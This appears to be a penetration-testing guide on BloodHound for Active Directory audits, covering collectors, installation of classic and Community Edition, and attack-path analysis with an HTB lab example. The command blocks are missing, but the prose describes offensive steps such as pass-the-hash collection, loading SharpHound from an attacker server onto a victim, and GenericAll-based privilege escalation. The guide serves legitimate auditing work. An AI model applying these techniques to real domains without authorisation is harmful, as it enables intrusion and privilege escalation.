Bloodhound
Last updated
Last updated
BloodHound is a fundamental tool in Active Directory audits, designed to identify trust relationships and potential attack vectors within a domain. It allows analysts to understand how an attacker could move laterally or escalate privileges by leveraging existing relationships between domain objects.
This section focuses on explaining the different data collection methods available (collectors), comparing their usage and applicability based on the environment. Additionally, we'll detail the installation process and key differences between classic BloodHound and BloodHound Community Edition (CE).
Throughout this guide, we'll cover:
Different collectors and their usage:
SharpHound.exe: The classic executable
SharpHound.ps1: Ideal for environments with PowerShell enabled
bloodhound-python: Designed for execution from Linux systems
RustHound-CE: The modern collector optimized for BH-CE
NetExec: Allows basic relationship extraction directly from Linux
certipy-ad: Focused on detecting relationships within AD CS environments, exporting in BloodHound CE compatible format
When to use each collector
Step-by-step installation for both classic BloodHound and BloodHound CE
Practical use cases in real audits or simulated environments
The objective is to clearly document how to work with BloodHound, integrate it into an audit, and maximize its capabilities.
For BloodHound to generate a useful and accurate domain graph, it's first necessary to perform an information collection phase. This task falls to the collectors, which are responsible for extracting structural data from the Active Directory environment: relationships between users and groups, active sessions, delegations, object permissions, among others.
Several collectors are currently available, each designed to adapt to different operational scenarios, privilege levels, or environment restrictions. Choosing the appropriate collector depends on both the technical context and the analysis objectives.
In this section, we document the main collectors used in AD audits, including their installation, execution, and particularities:
SharpHound.exe: The classic executable for Windows environments
SharpHound.ps1: PowerShell alternative useful in environments with more restrictive policies
bloodhound-python: Cross-platform collector, ideal for collection from Linux systems
RustHound-CE: Designed for BloodHound Community Edition, with a more modular and efficient approach
This section aims to serve as a practical reference for selecting and using the most appropriate collector based on the environment and audit objectives.
⚠️ VERY IMPORTANT!
Whenever we obtain a new user, it's recommended to run the BloodHound collector again with those credentials. It's possible that the first user had limited permissions to enumerate the domain, and with the new one we can obtain more relationships or privileges that weren't visible before.
Therefore, with each new account, the ideal is to execute another collector and generate a new .zip with updated environment information.
Via APT
Via PIP
Via PIPX
Via cloning repository
Resources:
It's recommended to synchronize time with the DC first to avoid KRB_AP_ERR_SKEW issues.
Username and password authentication
Pass-the-Hash (PtH) authentication
Kerberos authentication (.ccache)
Once Rust is installed on your system, install RustHound-CE with the following command:
Resource:
Username and password authentication
Kerberos authentication (.ccache)
Resource:
Import SharpHound.ps1 through a web server hosting the PS1 script (can be your own attacker server)
Having the PowerShell script on the victim machine, you can import it as follows
Resource:
Transfer the binary to the victim machine and execute it to collect information.
Username and password authentication
Pass-the-Hash (PtH) authentication
Kerberos authentication (.ccache)
Username and password authentication
LDAP (Port 389)
LDAPS (Port 636)
Pass-the-Hash (PtH) authentication
LDAP (Port 389)
LDAPS (Port 636)
Kerberos authentication (.ccache)
LDAP (Port 389)
LDAPS (Port 636)
Username and password authentication
LDAP (Port 389)
LDAPS (Port 636)
Pass-the-Hash (PtH) authentication
LDAP (Port 389)
LDAPS (Port 636)
Kerberos authentication (.ccache)
LDAP (Port 389)
LDAPS (Port 636)
Update repositories and install docker-compose on your system.
Download the docker-compose.yml file with cURL and verify it downloaded correctly.
You can also create the docker-compose.yml content directly:
docker-compose.yml
Start the containers defined in the docker-compose.yml file.
Verify that the containers are running and there haven't been any failures.
Check the initial password in the logs.
Access http://localhost:8080 and use the following credentials:
Username: admin
Password: Initial password obtained in the previous step
Enter the initial password in the first field, and the new password that must meet the established requirements.
Typically 12 characters minimum, 1 uppercase, 1 lowercase, 1 number and 1 special symbol.
You now have BloodHound CE correctly installed on your system through Docker.
In my case, I have the docker-compose.yml file in the /opt/BloodHound-CE
directory. This way, regardless of which directory I'm in, I can start it directly with the following command.
To start BloodHound-CE, you must have the containers already installed as indicated in the previous steps.
The command sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml up -d
is used to start the containers from scratch, which is useful if there are modifications to the docker-compose.yml. In our case, we won't modify it, so we should use start to launch it.
To stop BloodHound-CE, run the following command, thus freeing the ports it uses, etc. Then we can start it with the previous command or with sudo docker-compose -f /opt/BloodHound-CE/docker-compose.yml start
To upload our information collected through the Collectors, we need to go to http://localhost:8080. Once we're in the BloodHound-CE panel, we'll perform the following steps:
Go to the "Administration" section
Access the "File Ingest" tab
Click on "Upload File(s)"
Click inside the box or drag our .zip or individual JSON files directly
Select our compressed file
Once our file is selected, click the Upload option
Confirm that the message appears indicating they have been uploaded correctly. Click Close
Verify that after the collected data is integrated correctly, it appears as Complete. If another state like Cancelled appears, re-upload the file. If the problem persists, it's highly likely that the problem is with the compatibility of the Collector used, try another one.
Once everything is uploaded, we can use BloodHound-CE and navigate the interface.
When we need to delete the "database" that BloodHound-CE has from previously uploaded data, we must delete the data. We can do a "deep cleaning" to leave no trace of the uploaded data. To do this, we'll perform the following steps:
Access the "Administration" section
Go to the "Database Management" section
Check all boxes for "deep cleaning"
Click the "Proceed" option
Enter the keyword to confirm deletion "Please delete my data"
Once the confirmation word is entered, click "Confirm"
Once we have uploaded our data to BloodHound-CE, we can navigate the interface by accessing the "Explore" section.
In the SEARCH section, we can search for a node/object we want to query. If it doesn't appear, it means it doesn't exist or wasn't found during information collection (probably due to permissions issues).
When clicking on a node/object, the following menu with different submenus of the node/object will appear in the right sidebar, which we'll investigate below.
We have several sub-sections, although the most relevant for now are:
Object Information
Member Of
Outbound Object Control
Inbound Object Control
In the Object Information section, all the node/object information will appear. Among the information we can highlight:
Distinguished Name
Whether the user has DONT_REQ_PREAUTH (i.e., susceptible to AS-REP Roast)
Whether it's enabled
The Pathfinding functionality in BloodHound CE allows searching for attack paths from a starting node to a target, evaluating privileges and relationships between users and groups.
In this example, we start from OLIVIA@ADMINISTRATOR.HTB, which has GenericAll over MICHAEL@ADMINISTRATOR.HTB, allowing total control over that account. In turn, MICHAEL can force a password change for BENJAMIN@ADMINISTRATOR.HTB, completing the attack chain.
This type of view is key to identifying real paths for privilege escalation or lateral movements within the domain.
In BloodHound CE, edges represent relationships between domain objects. These relationships can be of different types: group membership (MemberOf), delegations (GetChanges, GenericAll, etc.), active sessions, ACLs, and many others.
When we click on an edge, a panel opens with more detail about that relationship. This panel includes different sections:
General
Windows Abuse
Linux Abuse
References
Shows a technical description of the detected relationship.
BloodHound CE allows manually marking domain objects as Owned (compromised) or High Value (priority targets). This helps us better visualize audit progress and focus path analysis on critical assets.
These marks are applied from right-clicking on the node. Once marked, the node is visually highlighted in the graph with a corresponding icon.
Owned: We mark a node as compromised when we already have control over it (for example, if we get credentials or remote execution).
High Value: We mark high-value targets that are critical to our objectives.
In the Group Management panel, we can manage objects marked as Owned or High Value in an organized way. Its use is summarized in the following steps:
Access the Group Management section from the people icon (left sidebar)
Select the group we want to review Owned/High Value
Choose the environment, normally All Active Directory Domains
Apply filters if we want to see only certain types of nodes (User, Group or Computer, etc.)
The list of objects belonging to that group is displayed, along with their type and status
By clicking on a node, its detailed information is displayed on the right: name, SID, OS, last logon, delegations, etc.
This section allows visual control of compromised objectives and planning next movements within the domain.
In this section, we can launch queries in Cypher language to query relationships within the BloodHound graph. It's very useful for searching attack paths or listing critical objects more precisely.
BloodHound CE already comes with several predefined queries, such as:
Kerberoastable users
Shortest paths to Domain Admins
List of all Domain Admins
Principals with dangerous privileges (DCSync, GenericAll, etc.)
We can also modify these queries or create our own based on what we need to search for in the environment.
BloodHound CE allows creating and saving our own queries in Cypher. This gives us flexibility to search for specific relationships in the graph and reuse those searches in future audits.
In the following GitHub repository, we have some already created Queries that we can add:
In this case, we put the QUERY we want to consult, click "Save Query", assign a name to the QUERY, and verify that it's saved. Clicking on it will perform the assigned query.
Update repositories and install BloodHound and Neo4j for BloodHound to work correctly.
Open Neo4j in a separate terminal, the web interface will start at http://localhost:7474
Access http://localhost:7474 and enter the following default credentials:
Username: neo4j
Password: neo4j
It will ask you to change the password.
Once you've modified the Neo4j password, open BloodHound in the background in a new terminal.
Enter the neo4j user and the new modified credentials. You can save credentials for automatic connection.
Once you log in, BloodHound will start correctly and you can navigate within it.
To start BloodHound once the installation is complete, execute the following commands.
In a separate terminal, open Neo4j. You should wait for the output line indicating that the web interface is enabled at http://localhost:7474
Open BloodHound in the background. If you have stored credentials with the check, it will log in automatically.
You need to have Rust installed on Kali. You can follow to install it.